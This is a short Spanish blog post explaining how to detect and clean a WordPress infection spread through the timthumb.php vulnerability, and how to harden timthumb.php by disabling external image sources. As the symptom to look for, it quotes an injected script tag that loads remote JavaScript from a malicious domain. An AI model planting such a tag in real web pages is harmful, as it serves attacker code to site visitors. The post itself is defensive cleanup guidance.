Vulnerabilidad en WordPress Superpuperdomain2.com
Vulnerabilidad en timthumb.php
Sintomas
Lo más probable es que cuando quieras entrar al sitio, tu antivirus, o tu navegador te avisen de que tu sitio esta cargando contenido de superpuperdomain2.com y éste es un sitio maligno. Sino, fijate el codigo fuente de tu web, y al final debes tener algo asi:
<script language=”javascript” SRC=”http://superpuperdomain2.com/count.php?ref=”>
¿Cómo solucionarlo?
Primero, el codigo malicioso, fue insertado en el index.php de tu blog. Lo debes borrar de ahi.
En segundo lugar, corrige el problema para que no vuelva a suceder… descarga la ultima version de timthum.php antes de reemplazarlo por el existente en tu theme, hazle los siguientes cambios:
Cambia define( ‘ALLOW_EXTERNAL’, TRUE); por define( ‘ALLOW_EXTERNAL’, false);
Y tambien cambia ésto:
$allowedSites = array ( ‘flickr.com’,
‘picasa.com’,
‘img.youtube.com’,
‘upload.wikimedia.org’,
);
Por ésto:
$allowedSites = array();
Para encontrar todos los timthumb.php que puedes tener, (uno por theme, aunque no todos lo usan) pudes hacer desde la consola:
find . | grep timthumb.php